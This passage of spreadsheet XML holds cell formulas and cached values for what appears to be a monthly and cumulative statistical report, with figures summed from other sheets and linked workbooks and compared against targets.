      </c>
      <c r="I81" s="301">
        <f>H81+yc!I81</f>
        <v>0</v>
      </c>
      <c r="J81" s="301"/>
      <c r="K81" s="194">
        <f>J81+'9'!K81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G82+'9'!H82</f>
        <v>0</v>
      </c>
      <c r="I82" s="301">
        <f>H82+yc!I82</f>
        <v>0</v>
      </c>
      <c r="J82" s="301"/>
      <c r="K82" s="194">
        <f>J82+'9'!K82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G83+'9'!H83</f>
        <v>0</v>
      </c>
      <c r="I83" s="301">
        <f>H83+yc!I83</f>
        <v>0</v>
      </c>
      <c r="J83" s="301"/>
      <c r="K83" s="194">
        <f>J83+'9'!K83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G84+'9'!H84</f>
        <v>0</v>
      </c>
      <c r="I84" s="301">
        <f>H84+yc!I84</f>
        <v>0</v>
      </c>
      <c r="J84" s="301"/>
      <c r="K84" s="194">
        <f>J84+'9'!K84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G85+'9'!H85</f>
        <v>0</v>
      </c>
      <c r="I85" s="301">
        <f>H85+yc!I85</f>
        <v>0</v>
      </c>
      <c r="J85" s="301"/>
      <c r="K85" s="194">
        <f>J85+'9'!K85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11/31</f>
        <v>0.354838709677419</v>
      </c>
      <c r="J2" s="180"/>
      <c r="K2" s="181"/>
      <c r="L2" s="180"/>
      <c r="M2" s="180"/>
      <c r="N2" s="182">
        <v>46002</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24013.26</v>
      </c>
      <c r="H5" s="194">
        <f>G5+'10'!H5</f>
        <v>233531.01</v>
      </c>
      <c r="I5" s="194">
        <f>H5+yc!I5</f>
        <v>6388397.04</v>
      </c>
      <c r="J5" s="194">
        <f>J21+J31+J41+J51+J61+J68+J79</f>
        <v>24172.32</v>
      </c>
      <c r="K5" s="194">
        <f>J5+'10'!K5</f>
        <v>252259.869</v>
      </c>
      <c r="L5" s="194">
        <f>K5+yc!L5</f>
        <v>6402331</v>
      </c>
      <c r="M5" s="194">
        <f>M21+M31+M41+M51+M61+M68+M79</f>
        <v>248738.965</v>
      </c>
      <c r="N5" s="195">
        <f>M5/374000*100</f>
        <v>66.5077446524063</v>
      </c>
      <c r="O5" s="196" t="s">
        <v>228</v>
      </c>
      <c r="P5" s="197" t="s">
        <v>229</v>
      </c>
      <c r="Q5" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R5" s="198">
        <f>'[10]11'!$W$100</f>
        <v>0</v>
      </c>
      <c r="S5" s="198">
        <f>'[10]11'!$X$101</f>
        <v>271.294167565063</v>
      </c>
      <c r="T5" s="198">
        <f>'[10]11'!$Y$101</f>
        <v>260.421411059556</v>
      </c>
      <c r="U5" s="198">
        <f>'[10]11'!$T$101</f>
        <v>0</v>
      </c>
      <c r="V5" s="198">
        <f>'[10]11'!$U$101</f>
        <v>87.4875</v>
      </c>
      <c r="W5" s="198">
        <f>'[10]11'!$V$101</f>
        <v>65.3899275362319</v>
      </c>
      <c r="X5" s="198">
        <f>'[10]11'!$Q$101</f>
        <v>0</v>
      </c>
      <c r="Y5" s="198">
        <f>'[10]11'!$R$101</f>
        <v>230.967</v>
      </c>
      <c r="Z5" s="198">
        <f>'[10]11'!$S$101</f>
        <v>5414.286</v>
      </c>
    </row>
    <row r="6" ht="15.75" customHeight="1" spans="1:26">
      <c r="A6" s="191"/>
      <c r="B6" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C6" s="193" t="s">
        <v>232</v>
      </c>
      <c r="D6" s="193"/>
      <c r="E6" s="194"/>
      <c r="F6" s="194">
        <f>'[10]11'!$D$23+'[11]11'!$D$17+'[12]11'!$D$17+'[13]11'!$D$25+'[14]11'!$D$8+'[14]11'!$D$15+'[15]11'!$D$7</f>
        <v>32112.84</v>
      </c>
      <c r="G6" s="194">
        <f>'[10]11'!$E$23+'[11]11'!$E$17+'[12]11'!$E$17+'[13]11'!$E$25+'[14]11'!$E$8+'[14]11'!$E$15+'[15]11'!$E$7</f>
        <v>0</v>
      </c>
      <c r="H6" s="194">
        <f>G6+'10'!H6</f>
        <v>2107</v>
      </c>
      <c r="I6" s="194">
        <f>H6+yc!I6</f>
        <v>278456.96</v>
      </c>
      <c r="J6" s="194">
        <f>'[10]11'!$I$23+'[11]11'!$I$17+'[12]11'!$I$17+'[13]11'!$I$25+'[14]11'!$E$23+'[14]11'!$E$30+'[15]11'!$H$7</f>
        <v>780.34</v>
      </c>
      <c r="K6" s="194">
        <f>J6+'10'!K6</f>
        <v>7680.85</v>
      </c>
      <c r="L6" s="194">
        <f>K6+yc!L6</f>
        <v>269878.55</v>
      </c>
      <c r="M6" s="194">
        <f>'[10]11'!$L$23+'[11]11'!$L$17+'[12]11'!$L$17+'[13]11'!$L$25+'[14]11'!$H$23+'[14]11'!$H$30+'[15]11'!$K$7</f>
        <v>26538.99</v>
      </c>
      <c r="N6" s="195"/>
      <c r="O6" s="199"/>
      <c r="P6" s="200"/>
      <c r="Q6" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R6" s="198">
        <f>'[10]11'!$W$102</f>
        <v>0</v>
      </c>
      <c r="S6" s="198">
        <f>'[10]11'!$X$102</f>
        <v>0</v>
      </c>
      <c r="T6" s="198">
        <f>'[10]11'!$Y$102</f>
        <v>240.280205356462</v>
      </c>
      <c r="U6" s="198">
        <f>'[10]11'!$T$102</f>
        <v>0</v>
      </c>
      <c r="V6" s="198">
        <f>'[10]11'!$U$102</f>
        <v>0</v>
      </c>
      <c r="W6" s="198">
        <f>'[10]11'!$V$102</f>
        <v>34.362306763285</v>
      </c>
      <c r="X6" s="198">
        <f>'[10]11'!$Q$102</f>
        <v>0</v>
      </c>
      <c r="Y6" s="198">
        <f>'[10]11'!$R$102</f>
        <v>0</v>
      </c>
      <c r="Z6" s="198">
        <f>'[10]11'!$S$102</f>
        <v>2845.199</v>
      </c>
    </row>
    <row r="7" ht="15.75" customHeight="1" spans="1:26">
      <c r="A7" s="191"/>
      <c r="B7" s="191"/>
      <c r="C7" s="201" t="s">
        <v>331</v>
      </c>
      <c r="D7" s="201"/>
      <c r="E7" s="194"/>
      <c r="F7" s="194">
        <f>'[12]11'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G7" s="194">
        <f>'[12]11'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H7" s="194">
        <f>G7+'10'!H7</f>
        <v>0</v>
      </c>
      <c r="I7" s="194">
        <f>H7+yc!I7</f>
        <v>0</v>
      </c>
      <c r="J7" s="194">
        <f>'[12]11'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K7" s="194">
        <f>J7+'10'!K7</f>
        <v>0</v>
      </c>
      <c r="L7" s="194">
        <f>K7+yc!L7</f>
        <v>0</v>
      </c>
      <c r="M7" s="194">
        <f>'[12]11'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N7" s="195"/>
      <c r="O7" s="199"/>
      <c r="P7" s="200"/>
      <c r="Q7" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R7" s="202">
        <f>'[10]11'!$W$107</f>
        <v>124.852071005917</v>
      </c>
      <c r="S7" s="202">
        <f>'[10]11'!$X$107</f>
        <v>125.65470815204</v>
      </c>
      <c r="T7" s="198">
        <f>'[10]11'!$Y$107</f>
        <v>131.638054034151</v>
      </c>
      <c r="U7" s="198">
        <f>'[10]11'!$T$107</f>
        <v>49.2916666666667</v>
      </c>
      <c r="V7" s="198">
        <f>'[10]11'!$U$107</f>
        <v>46.1401515151515</v>
      </c>
      <c r="W7" s="198">
        <f>'[10]11'!$V$107</f>
        <v>31.4884057971014</v>
      </c>
      <c r="X7" s="198">
        <f>'[10]11'!$Q$107</f>
        <v>11.83</v>
      </c>
      <c r="Y7" s="198">
        <f>'[10]11'!$R$107</f>
        <v>121.81</v>
      </c>
      <c r="Z7" s="198">
        <f>'[10]11'!$S$107</f>
        <v>2607.24</v>
      </c>
    </row>
    <row r="8" ht="15.75" customHeight="1" spans="1:26">
      <c r="A8" s="191"/>
      <c r="B8" s="191"/>
      <c r="C8" s="201" t="s">
        <v>236</v>
      </c>
      <c r="D8" s="201"/>
      <c r="E8" s="194"/>
      <c r="F8" s="194">
        <f>'[10]11'!$D$27+'[11]11'!$D$18+'[13]11'!$D$26+'[14]11'!$D$10+'[14]11'!$D$17+'[15]11'!$D$9</f>
        <v>41879.9</v>
      </c>
      <c r="G8" s="194">
        <f>'[10]11'!$E$27+'[11]11'!$E$18+'[13]11'!$E$26+'[14]11'!$E$10+'[14]11'!$E$17+'[15]11'!$E$9</f>
        <v>694</v>
      </c>
      <c r="H8" s="194">
        <f>G8+'10'!H8</f>
        <v>19318</v>
      </c>
      <c r="I8" s="194">
        <f>H8+yc!I8</f>
        <v>544854.99</v>
      </c>
      <c r="J8" s="194">
        <f>'[10]11'!$I$27+'[11]11'!$I$18+'[13]11'!$I$26+'[14]11'!$E$25+'[14]11'!$E$32+'[15]11'!$H$9</f>
        <v>2656.07</v>
      </c>
      <c r="K8" s="194">
        <f>J8+'10'!K8</f>
        <v>27891.65</v>
      </c>
      <c r="L8" s="194">
        <f>K8+yc!L8</f>
        <v>535636.36</v>
      </c>
      <c r="M8" s="194">
        <f>'[10]11'!$L$27+'[11]11'!$L$18+'[13]11'!$L$26+'[14]11'!$H$25+'[14]11'!$H$32+'[15]11'!$K$9</f>
        <v>33306.25</v>
      </c>
      <c r="N8" s="195"/>
      <c r="O8" s="199"/>
      <c r="P8" s="200"/>
      <c r="Q8" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R8" s="198">
        <f>'[10]11'!$W$108</f>
        <v>137.193575655114</v>
      </c>
      <c r="S8" s="198">
        <f>'[10]11'!$X$108</f>
        <v>131.279923396106</v>
      </c>
      <c r="T8" s="198">
        <f>'[10]11'!$Y$108</f>
        <v>127.632343885245</v>
      </c>
      <c r="U8" s="198">
        <f>'[10]11'!$T$108</f>
        <v>49.2916666666667</v>
      </c>
      <c r="V8" s="198">
        <f>'[10]11'!$U$108</f>
        <v>47.469696969697</v>
      </c>
      <c r="W8" s="198">
        <f>'[10]11'!$V$108</f>
        <v>28.0455314009661</v>
      </c>
      <c r="X8" s="198">
        <f>'[10]11'!$Q$108</f>
        <v>11.83</v>
      </c>
      <c r="Y8" s="198">
        <f>'[10]11'!$R$108</f>
        <v>125.32</v>
      </c>
      <c r="Z8" s="198">
        <f>'[10]11'!$S$108</f>
        <v>2322.17</v>
      </c>
    </row>
    <row r="9" ht="15.75" customHeight="1" spans="1:26">
      <c r="A9" s="191"/>
      <c r="B9" s="191"/>
      <c r="C9" s="201" t="s">
        <v>238</v>
      </c>
      <c r="D9" s="201"/>
      <c r="E9" s="194"/>
      <c r="F9" s="194">
        <f>'[10]11'!$D$24+'[11]11'!$D$19+'[12]11'!$D$20+'[13]11'!$D$27+'[14]11'!$D$11+'[14]11'!$D$18+'[15]11'!$D$10</f>
        <v>110865.712</v>
      </c>
      <c r="G9" s="194">
        <f>'[10]11'!$E$24+'[11]11'!$E$19+'[12]11'!$E$20+'[13]11'!$E$27+'[14]11'!$E$11+'[14]11'!$E$18+'[15]11'!$E$10</f>
        <v>16974</v>
      </c>
      <c r="H9" s="194">
        <f>G9+'10'!H9</f>
        <v>173398</v>
      </c>
      <c r="I9" s="194">
        <f>H9+yc!I9</f>
        <v>4308786.88</v>
      </c>
      <c r="J9" s="194">
        <f>'[10]11'!$I$24+'[11]11'!$I$19+'[12]11'!$I$20+'[13]11'!$I$27+'[14]11'!$E$26+'[14]11'!$E$33+'[15]11'!$H$10</f>
        <v>16359.91</v>
      </c>
      <c r="K9" s="194">
        <f>J9+'10'!K9</f>
        <v>169651.669</v>
      </c>
      <c r="L9" s="194">
        <f>K9+yc!L9</f>
        <v>4267130.48</v>
      </c>
      <c r="M9" s="194">
        <f>'[10]11'!$L$24+'[11]11'!$L$19+'[12]11'!$L$20+'[13]11'!$L$27+'[14]11'!$H$26+'[14]11'!$H$33+'[15]11'!$K$10</f>
        <v>114612.043</v>
      </c>
      <c r="N9" s="195"/>
      <c r="O9" s="199"/>
      <c r="P9" s="200"/>
      <c r="Q9" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R9" s="198">
        <f>'[10]11'!$W$109</f>
        <v>0</v>
      </c>
      <c r="S9" s="198">
        <f>'[10]11'!$X$109</f>
        <v>272.595281306715</v>
      </c>
      <c r="T9" s="198">
        <f>'[10]11'!$Y$109</f>
        <v>271.352232336368</v>
      </c>
      <c r="U9" s="198">
        <f>'[10]11'!$T$109</f>
        <v>0</v>
      </c>
      <c r="V9" s="198">
        <f>'[10]11'!$U$109</f>
        <v>33.3939393939394</v>
      </c>
      <c r="W9" s="198">
        <f>'[10]11'!$V$109</f>
        <v>34.8278985507246</v>
      </c>
      <c r="X9" s="198">
        <f>'[10]11'!$Q$109</f>
        <v>0</v>
      </c>
      <c r="Y9" s="198">
        <f>'[10]11'!$R$109</f>
        <v>88.16</v>
      </c>
      <c r="Z9" s="198">
        <f>'[10]11'!$S$109</f>
        <v>2883.74999999999</v>
      </c>
    </row>
    <row r="10" ht="15.75" customHeight="1" spans="1:26">
      <c r="A10" s="191"/>
      <c r="B10" s="191"/>
      <c r="C10" s="201" t="s">
        <v>295</v>
      </c>
      <c r="D10" s="201"/>
      <c r="E10" s="194"/>
      <c r="F10" s="194">
        <f>'[10]11'!$D$25+'[11]11'!$D$20+'[12]11'!$D$21+'[13]11'!$D$28+'[14]11'!$D$12+'[14]11'!$D$19+'[15]11'!$D$11</f>
        <v>61206.942</v>
      </c>
      <c r="G10" s="194">
        <f>'[10]11'!$E$25+'[11]11'!$E$20+'[12]11'!$E$21+'[13]11'!$E$28+'[14]11'!$E$12+'[14]11'!$E$19+'[15]11'!$E$11</f>
        <v>4822</v>
      </c>
      <c r="H10" s="194">
        <f>G10+'10'!H10</f>
        <v>24080</v>
      </c>
      <c r="I10" s="194">
        <f>H10+yc!I10</f>
        <v>941607.17</v>
      </c>
      <c r="J10" s="194">
        <f>'[10]11'!$I$25+'[11]11'!$I$20+'[12]11'!$I$21+'[13]11'!$I$28+'[14]11'!$E$27+'[14]11'!$E$34+'[15]11'!$H$11</f>
        <v>2887.5</v>
      </c>
      <c r="K10" s="194">
        <f>J10+'10'!K10</f>
        <v>31948.3</v>
      </c>
      <c r="L10" s="194">
        <f>K10+yc!L10</f>
        <v>929177.02</v>
      </c>
      <c r="M10" s="194">
        <f>'[10]11'!$L$25+'[11]11'!$L$20+'[12]11'!$L$21+'[13]11'!$L$28+'[14]11'!$H$27+'[14]11'!$H$34+'[15]11'!$K$11</f>
        <v>53338.642</v>
      </c>
      <c r="N10" s="195"/>
      <c r="O10" s="199"/>
      <c r="P10" s="200"/>
      <c r="Q10" s="193" t="s">
        <v>296</v>
      </c>
      <c r="R10" s="198">
        <f>'[10]11'!$W$110</f>
        <v>214.374353671148</v>
      </c>
      <c r="S10" s="198">
        <f>'[10]11'!$X$110</f>
        <v>258.275249419161</v>
      </c>
      <c r="T10" s="198">
        <f>'[10]11'!$Y$110</f>
        <v>268.57815545444</v>
      </c>
      <c r="U10" s="198">
        <f>'[10]11'!$T$110</f>
        <v>40.2916666666667</v>
      </c>
      <c r="V10" s="198">
        <f>'[10]11'!$U$110</f>
        <v>27.7159090909091</v>
      </c>
      <c r="W10" s="198">
        <f>'[10]11'!$V$110</f>
        <v>34.2660628019323</v>
      </c>
      <c r="X10" s="198">
        <f>'[10]11'!$Q$110</f>
        <v>9.67</v>
      </c>
      <c r="Y10" s="198">
        <f>'[10]11'!$R$110</f>
        <v>73.17</v>
      </c>
      <c r="Z10" s="198">
        <f>'[10]11'!$S$110</f>
        <v>2837.23</v>
      </c>
    </row>
    <row r="11" ht="15.75" customHeight="1" spans="1:26">
      <c r="A11" s="191"/>
      <c r="B11" s="191"/>
      <c r="C11" s="201" t="s">
        <v>297</v>
      </c>
      <c r="D11" s="201"/>
      <c r="E11" s="194"/>
      <c r="F11" s="194">
        <f>'[10]11'!$D$26+'[11]11'!$D$21+'[12]11'!$D$19+'[13]11'!$D$29+'[14]11'!$D$13+'[14]11'!$D$20</f>
        <v>0</v>
      </c>
      <c r="G11" s="194">
        <f>'[10]11'!$E$26+'[11]11'!$E$21+'[12]11'!$E$19+'[13]11'!$E$29+'[14]11'!$E$13+'[14]11'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H11" s="194">
        <f>G11+'10'!H11</f>
        <v>153.81</v>
      </c>
      <c r="I11" s="194">
        <f>H11+yc!I11</f>
        <v>153.81</v>
      </c>
      <c r="J11" s="194">
        <f>'[10]11'!$I$26+'[11]11'!$I$21+'[12]11'!$I$19+'[13]11'!$I$29+'[14]11'!$E$28+'[14]11'!$E$35</f>
        <v>0</v>
      </c>
      <c r="K11" s="194">
        <f>J11+'10'!K11</f>
        <v>0</v>
      </c>
      <c r="L11" s="194">
        <f>K11+yc!L11</f>
        <v>0</v>
      </c>
      <c r="M11" s="194">
        <f>'[10]11'!$L$26+'[11]11'!$L$21+'[12]11'!$L$19+'[13]11'!$L$29+'[14]11'!$H$28+'[14]11'!$H$35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6610.00000000002</v>
      </c>
      <c r="H12" s="194">
        <f>G12+'10'!H12</f>
        <v>109646</v>
      </c>
      <c r="I12" s="194">
        <f>H12+yc!I12</f>
        <v>5052037.25</v>
      </c>
      <c r="J12" s="194">
        <f>J22+J32+J42+J52+J62+J69</f>
        <v>17402.5</v>
      </c>
      <c r="K12" s="194">
        <f>J12+'10'!K12</f>
        <v>194719.961</v>
      </c>
      <c r="L12" s="194">
        <f>K12+yc!L12</f>
        <v>5223826.337</v>
      </c>
      <c r="M12" s="194">
        <f>M22+M32+M42+M52+M62+M69</f>
        <v>316436.74400005</v>
      </c>
      <c r="N12" s="205">
        <f>M12/439000*100</f>
        <v>72.0812628701709</v>
      </c>
      <c r="O12" s="199"/>
      <c r="P12" s="200"/>
      <c r="Q12" s="203" t="s">
        <v>299</v>
      </c>
      <c r="R12" s="204">
        <f>'[16]11'!$W$40</f>
        <v>0</v>
      </c>
      <c r="S12" s="204">
        <f>'[16]11'!$X$40</f>
        <v>0</v>
      </c>
      <c r="T12" s="204">
        <f>'[16]11'!$Y$40</f>
        <v>0</v>
      </c>
      <c r="U12" s="204">
        <f>'[16]11'!$T$40</f>
        <v>0</v>
      </c>
      <c r="V12" s="204">
        <f>'[16]11'!$U$40</f>
        <v>0</v>
      </c>
      <c r="W12" s="204">
        <f>'[16]11'!$V$40</f>
        <v>0</v>
      </c>
      <c r="X12" s="204">
        <f>'[16]11'!$Q$40</f>
        <v>0</v>
      </c>
      <c r="Y12" s="204">
        <f>'[16]11'!$R$40</f>
        <v>0</v>
      </c>
      <c r="Z12" s="204">
        <f>'[16]11'!$S$40</f>
        <v>0</v>
      </c>
    </row>
    <row r="13" ht="15.75" customHeight="1" spans="1:26">
      <c r="A13" s="191"/>
      <c r="B13" s="193"/>
      <c r="C13" s="193"/>
      <c r="D13" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E13" s="194">
        <f>E23+E33+E43+E53+E63+E70</f>
        <v>0</v>
      </c>
      <c r="F13" s="194">
        <f>F23+F33+F43+F53+F63+F70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G13" s="194">
        <f>G23+G33+G43+G53+G63+G70</f>
        <v>0</v>
      </c>
      <c r="H13" s="194">
        <f>G13+'10'!H13</f>
        <v>0</v>
      </c>
      <c r="I13" s="194">
        <f>H13+yc!I13</f>
        <v>0</v>
      </c>
      <c r="J13" s="194">
        <f>J23+J33+J43+J53+J63+J70</f>
        <v>0</v>
      </c>
      <c r="K13" s="194">
        <f>J13+'10'!K13</f>
        <v>0</v>
      </c>
      <c r="L13" s="194">
        <f>K13+yc!L13</f>
        <v>0</v>
      </c>
      <c r="M13" s="194">
        <f>M23+M33+M43+M53+M63+M70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="N13" s="207">
        <f>(M12+M13)/(315000+80000+150000)*100</f>
        <v>58.0617878899175</v>
      </c>
      <c r="O13" s="199"/>
      <c r="P13" s="208" t="s">
        <v>237</v>
      </c>
      <c r="Q13" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R13" s="209">
        <f>'[11]11'!$W$68</f>
        <v>275.416666666667</v>
      </c>
      <c r="S13" s="209">
        <f>'[11]11'!$X$68</f>
        <v>263.966292134831</v>
      </c>
      <c r="T13" s="209">
        <f>'[11]11'!$Y$68</f>
        <v>266.309463214019</v>
      </c>
      <c r="U13" s="209">
        <f>'[11]11'!$T$68</f>
        <v>100</v>
      </c>
      <c r="V13" s="209">
        <f>'[11]11'!$U$68</f>
        <v>67.4242424242424</v>
      </c>
      <c r="W13" s="209">
        <f>'[11]11'!$V$68</f>
        <v>71.4194444444445</v>
      </c>
      <c r="X13" s="210" t="str">
        <f>'[11]11'!$Q$68</f>
        <v>24.00</v>
      </c>
      <c r="Y13" s="210" t="str">
        <f>'[11]11'!$R$68</f>
        <v>178.00</v>
      </c>
      <c r="Z13" s="210" t="str">
        <f>'[11]11'!$S$68</f>
        <v>5913.53</v>
      </c>
    </row>
    <row r="14" ht="15.75" customHeight="1" spans="1:26">
      <c r="A14" s="191"/>
      <c r="B14" s="193"/>
      <c r="C14" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D14" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E14" s="194">
        <f>E24+E34+E44+E54</f>
        <v>0</v>
      </c>
      <c r="F14" s="194">
        <f>F24+F34+F44+F54</f>
        <v>0</v>
      </c>
      <c r="G14" s="194">
        <f>G24+G34+G44+G54+G62</f>
        <v>2814</v>
      </c>
      <c r="H14" s="194">
        <f>G14+'10'!H14</f>
        <v>27805</v>
      </c>
      <c r="I14" s="194">
        <f>H14+yc!I14</f>
        <v>992348.676</v>
      </c>
      <c r="J14" s="194">
        <f>J24+J34+J44+J54+J62</f>
        <v>4702.3</v>
      </c>
      <c r="K14" s="194">
        <f>J14+'10'!K14</f>
        <v>58261.095</v>
      </c>
      <c r="L14" s="194">
        <f>K14+yc!L14</f>
        <v>1851205.201</v>
      </c>
      <c r="M14" s="194">
        <f>M24+M34+M44+M54</f>
        <v>64232.78</v>
      </c>
      <c r="N14" s="211"/>
      <c r="O14" s="199"/>
      <c r="P14" s="208"/>
      <c r="Q14" s="193" t="s">
        <v>239</v>
      </c>
      <c r="R14" s="209">
        <f>'[11]11'!$W$71</f>
        <v>208.208333333333</v>
      </c>
      <c r="S14" s="209">
        <f>'[11]11'!$X$71</f>
        <v>219.644891122278</v>
      </c>
      <c r="T14" s="209">
        <f>'[11]11'!$Y$71</f>
        <v>213.720110159852</v>
      </c>
      <c r="U14" s="209">
        <f>'[11]11'!$T$71</f>
        <v>100</v>
      </c>
      <c r="V14" s="209">
        <f>'[11]11'!$U$71</f>
        <v>56.5340909090909</v>
      </c>
      <c r="W14" s="209">
        <f>'[11]11'!$V$71</f>
        <v>50.4317632850242</v>
      </c>
      <c r="X14" s="210" t="str">
        <f>'[11]11'!$Q$71</f>
        <v>24.00</v>
      </c>
      <c r="Y14" s="210" t="str">
        <f>'[11]11'!$R$71</f>
        <v>149.25</v>
      </c>
      <c r="Z14" s="210" t="str">
        <f>'[11]11'!$S$71</f>
        <v>4175.75</v>
      </c>
    </row>
    <row r="15" ht="15.75" customHeight="1" spans="1:26">
      <c r="A15" s="191"/>
      <c r="B15" s="193"/>
      <c r="C15" s="193"/>
      <c r="D15" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E15" s="194">
        <f>E25+E35+E45+E55</f>
        <v>0</v>
      </c>
      <c r="F15" s="194">
        <f>F25+F35+F45+F55</f>
        <v>0</v>
      </c>
      <c r="G15" s="194">
        <f>G25+G35+G45+G55</f>
        <v>0</v>
      </c>
      <c r="H15" s="194">
        <f>G15+'10'!H15</f>
        <v>0</v>
      </c>
      <c r="I15" s="194">
        <f>H15+yc!I15</f>
        <v>0</v>
      </c>
      <c r="J15" s="194">
        <f>J25+J35+J45+J55</f>
        <v>149.6</v>
      </c>
      <c r="K15" s="194">
        <f>J15+'10'!K15</f>
        <v>2271.276</v>
      </c>
      <c r="L15" s="194">
        <f>K15+yc!L15</f>
        <v>117027.776</v>
      </c>
      <c r="M15" s="194"/>
      <c r="N15" s="212"/>
      <c r="O15" s="199"/>
      <c r="P15" s="208"/>
      <c r="Q15" s="193" t="s">
        <v>241</v>
      </c>
      <c r="R15" s="209">
        <f>'[11]11'!$W$72</f>
        <v>66.375</v>
      </c>
      <c r="S15" s="209">
        <f>'[11]11'!$X$72</f>
        <v>65.7464278787095</v>
      </c>
      <c r="T15" s="209">
        <f>'[11]11'!$Y$72</f>
        <v>61.4476802970281</v>
      </c>
      <c r="U15" s="209">
        <f>'[11]11'!$T$72</f>
        <v>100</v>
      </c>
      <c r="V15" s="209">
        <f>'[11]11'!$U$72</f>
        <v>58.5871212121212</v>
      </c>
      <c r="W15" s="209">
        <f>'[11]11'!$V$72</f>
        <v>51.0044685990338</v>
      </c>
      <c r="X15" s="210" t="str">
        <f>'[11]11'!$Q$72</f>
        <v>24.00</v>
      </c>
      <c r="Y15" s="210" t="str">
        <f>'[11]11'!$R$72</f>
        <v>154.67</v>
      </c>
      <c r="Z15" s="210" t="str">
        <f>'[11]11'!$S$72</f>
        <v>4223.17</v>
      </c>
    </row>
    <row r="16" ht="15.75" customHeight="1" spans="1:26">
      <c r="A16" s="191"/>
      <c r="B16" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C16" s="193"/>
      <c r="D16" s="193"/>
      <c r="E16" s="194">
        <f>E26+E36+E46+E56+E64+E71</f>
        <v>0</v>
      </c>
      <c r="F16" s="194"/>
      <c r="G16" s="194">
        <f>G26+G36+G46+G56+G64+G71</f>
        <v>0</v>
      </c>
      <c r="H16" s="194">
        <f>G16+'10'!H16</f>
        <v>0</v>
      </c>
      <c r="I16" s="194">
        <f>H16+yc!I16</f>
        <v>0</v>
      </c>
      <c r="J16" s="194">
        <f>J26+J36+J46+J56+J64+J71+J75</f>
        <v>0</v>
      </c>
      <c r="K16" s="194">
        <f>J16+'10'!K16</f>
        <v>0</v>
      </c>
      <c r="L16" s="194">
        <f>K16+yc!L16</f>
        <v>0</v>
      </c>
      <c r="M16" s="194"/>
      <c r="N16" s="195"/>
      <c r="O16" s="199"/>
      <c r="P16" s="208"/>
      <c r="Q16" s="193" t="s">
        <v>243</v>
      </c>
      <c r="R16" s="209">
        <f>'[11]11'!$W$73</f>
        <v>57.4166666666667</v>
      </c>
      <c r="S16" s="209">
        <f>'[11]11'!$X$73</f>
        <v>63.3413072994117</v>
      </c>
      <c r="T16" s="209">
        <f>'[11]11'!$Y$73</f>
        <v>62.9319241165006</v>
      </c>
      <c r="U16" s="209">
        <f>'[11]11'!$T$73</f>
        <v>100</v>
      </c>
      <c r="V16" s="209">
        <f>'[11]11'!$U$73</f>
        <v>58.5871212121212</v>
      </c>
      <c r="W16" s="209">
        <f>'[11]11'!$V$73</f>
        <v>52.5468599033817</v>
      </c>
      <c r="X16" s="210" t="str">
        <f>'[11]11'!$Q$73</f>
        <v>24.00</v>
      </c>
      <c r="Y16" s="210" t="str">
        <f>'[11]11'!$R$73</f>
        <v>154.67</v>
      </c>
      <c r="Z16" s="210" t="str">
        <f>'[11]11'!$S$73</f>
        <v>4350.88</v>
      </c>
    </row>
    <row r="17" ht="15.75" customHeight="1" spans="1:26">
      <c r="A17" s="191"/>
      <c r="B17" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C17" s="193"/>
      <c r="D17" s="193"/>
      <c r="E17" s="194">
        <f>E27+E37+E47+E57+E65+E72+E83</f>
        <v>650000</v>
      </c>
      <c r="F17" s="194"/>
      <c r="G17" s="194">
        <f>G27+G37+G47+G57+G65+G72</f>
        <v>0</v>
      </c>
      <c r="H17" s="194">
        <f>G17+'10'!H17</f>
        <v>0</v>
      </c>
      <c r="I17" s="194">
        <f>H17+yc!I17</f>
        <v>0</v>
      </c>
      <c r="J17" s="194">
        <f>J27+J37+J47+J57+J65+J72+J76</f>
        <v>0</v>
      </c>
      <c r="K17" s="194">
        <f>J17+'10'!K17</f>
        <v>0</v>
      </c>
      <c r="L17" s="194">
        <f>K17+yc!L17</f>
        <v>0</v>
      </c>
      <c r="M17" s="194"/>
      <c r="N17" s="195"/>
      <c r="O17" s="199"/>
      <c r="P17" s="213" t="s">
        <v>252</v>
      </c>
      <c r="Q17" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R17" s="209">
        <f>'[12]11'!$W$71</f>
        <v>0</v>
      </c>
      <c r="S17" s="209">
        <f>'[12]11'!$X$71</f>
        <v>0</v>
      </c>
      <c r="T17" s="209">
        <f>'[12]11'!$Y$71</f>
        <v>0</v>
      </c>
      <c r="U17" s="209">
        <f>'[12]11'!$T$71</f>
        <v>0</v>
      </c>
      <c r="V17" s="209">
        <f>'[12]11'!$U$71</f>
        <v>0</v>
      </c>
      <c r="W17" s="209">
        <f>'[12]11'!$V$71</f>
        <v>0</v>
      </c>
      <c r="X17" s="209">
        <f>'[12]11'!$Q$71</f>
        <v>0</v>
      </c>
      <c r="Y17" s="209">
        <f>'[12]11'!$R$71</f>
        <v>0</v>
      </c>
      <c r="Z17" s="209">
        <f>'[12]11'!$S$71</f>
        <v>0</v>
      </c>
    </row>
    <row r="18" ht="15.75" customHeight="1" spans="1:26">
      <c r="A18" s="191"/>
      <c r="B18" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C18" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D18" s="193"/>
      <c r="E18" s="194">
        <f>E28+E38+E48+E58+E66+E73</f>
        <v>0</v>
      </c>
      <c r="F18" s="194"/>
      <c r="G18" s="194">
        <f>G28+G38+G48+G58+G66+G73</f>
        <v>0</v>
      </c>
      <c r="H18" s="194">
        <f>G18+'10'!H18</f>
        <v>0</v>
      </c>
      <c r="I18" s="194">
        <f>H18+yc!I18</f>
        <v>0</v>
      </c>
      <c r="J18" s="194">
